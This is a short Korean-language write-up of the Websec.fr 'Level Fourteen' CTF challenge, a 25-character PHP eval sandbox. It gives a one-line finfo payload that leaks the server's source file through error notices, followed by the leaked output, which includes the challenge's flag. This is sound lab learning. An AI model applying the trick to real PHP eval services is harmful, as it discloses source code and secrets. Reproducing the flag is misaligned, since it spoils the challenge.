[Websec.fr] Hard - Level14

[5월 15일]

기존 문제들의 난이도가 높기 때문에 hard는 어느 정도인지 가늠해보고 싶어서 풀게 되었다.

 

 

Level Fourteen - Securely Execute Code

Don't you love these online PHP executing services like 3v4l.org?
Unfortunately they're insecure as hell, so we made our own where we only allow echo, print, strlen, strcmp, strncmp.
Oh and you're limited to 25 chars only. Try it out!

 

이문제는 echo, print, strlen, strcmp, strncmp 만 쓰는것을 허용하고 길이 제한은 25자였다.
 PHP function과 class에 대한 지식이 필요하다.

echo new finfo(0,'/');
---------------------
Dumps all directory
---------------------
Notice:  finfo::finfo(): Warning: offset `<?php' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `<?php' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `$flag = 'WEBSEC{that_must_have_been_some_nifty_php_trick_you_had_there}';' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `$flag = 'WEBSEC{that_must_have_been_some_nifty_php_trick_you_had_there}';' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `<?php ' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `<?php ' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `ini_set('display_errors', 'on');' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `ini_set('display_errors', 'on');' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `ini_set('error_reporting', E_ALL ^ E_DEPRECATED);' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `ini_set('error_reporting', E_ALL ^ E_DEPRECATED);' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `if (isset ($_POST['code']) && is_string ($_POST['code'])) {' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `(isset ($_POST['code']) && is_string ($_POST['code'])) {' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `	$code = substr ($_POST['code'], 0, 25);' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `$code = substr ($_POST['code'], 0, 25);' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `} else {' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `} else {' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `	$code = "print('I hate PHP');";' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `$code = "print('I hate PHP');";' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `}' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `}' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `?>' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `?>' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `<!DOCTYPE html>' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `<!DOCTYPE html>' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: offset `<html>' invalid in /index.php(76) : eval()'d code on line 1
Notice:  finfo::finfo(): Warning: type `<html>' invalid in /index.php(76) : eval()'d code on line 1